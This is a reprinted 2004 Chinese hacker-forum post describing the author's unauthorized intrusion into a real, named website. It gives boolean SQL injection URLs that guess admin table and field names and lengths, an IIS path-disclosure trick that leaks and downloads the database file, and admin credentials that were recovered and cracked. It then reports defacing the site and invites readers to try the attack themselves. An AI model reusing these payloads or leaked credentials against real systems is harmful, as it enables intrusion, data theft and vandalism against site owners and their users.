为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

黑基原创:记一次对永联网的简单渗透

2004-9-29 20:05| 投稿: security

摘要: 作者:随爱飞翔    转自:黑基bbs原创作品版 对 永联网的 SQL注入 以及安全检测首先打开主站 看到 开放两口 我们先进备用一 为开放站 http://bbs....
作者:随爱飞翔    转自:黑基bbs原创作品版 对 永联网的 SQL注入 以及安全检测首先打开主站 看到 开放两口 我们先进备用一 为开放站 http://bbs.r8r8.com/index/进入后看到站点  从 http://bbs.r8r8.com/index/k33/list.asp?id=564测试SQL注入 http://bbs.r8r8.com/index/k33/list.asp?id=564 and 1=1 http://bbs.r8r8.com/index/k33/list.asp?id=564 and 1=2发现有SQL注入漏洞 然后进行猜解 提交 http://bbs.r8r8.com/index/k33/list.asp?id=564 and 0<(select count(*) from admin) 猜到表名admin 猜帐号字段名http://bbs.r8r8.com/index/k33/list.asp?id=564 and 1=(select top 1 Count(*) From admin where len(username)>0)页面返回正常 猜到帐号字段名username猜解帐号字段长度http://bbs.r8r8.com/index/k33/list.asp?id=564 and 1=(select top 1 Count(*) From admin where len(username)=3) 页面返回正常 说明帐号为3位 然后猜密码字段名http://bbs.r8r8.com/index/k33/list.asp?id=564 and 1=(select top 1 Count(*) From admin where len(password)>0)页面返回正常 猜到密码字段名为password接着猜密码长度http://bbs.r8r8.com/index/k33/list.asp?id=564 and 1=(select top 1 Count(*) From admin where len(password)=8) 页面返回正常 说明密码为8位接着就是长期的测试过程 得到的帐号为柏拉图 密码为 killr8r8 其实在测试期间 我顺便看了一下站点 竟然存在IIS暴库~ 愁 提交 URL:http://bbs.r8r8.com/index/k33%5clist.asp?id=564返回Microsoft JET Database Engine 错误 '80004005' 找不到文件 'D:\Hosting\WwwRoot\bbs_r8r8_com\htdocs\index\kill148000.mdb'。 /index/k33/conn.asp,行11 数据库下载地址为:http://bbs.r8r8.com/index/k33/kill148000.mdb 判断服务器配置有问题 根据这点往下看 http://bbs.r8r8.com/soft222/ 来到服务器下的下载站继续IIS暴库http://bbs.r8r8.com/soft222%5cshow.asp?id=633返回Microsoft JET Database Engine 错误 '80004005' 'D:\Hosting\WwwRoot\bbs_r8r8_com\htdocs\hacksossos\hackabc9.asp'不是一 个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器 。 /soft222/user.asp,行6 数据库是ASP的 我本想应该是不能下载了~ 没想竟然数据库没有禁止下载 于是使 用网络蚂蚁把他下了下来  密码是MD532位加密 于是开始跑密码 跑到一管理密码 010110 后台的登陆全部被修改了 于是在前台把公告修改了 顺便下点会员软件 嘿嘿 到文章发出来至今 管理还未看到 有兴趣的 都去试一下:)

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部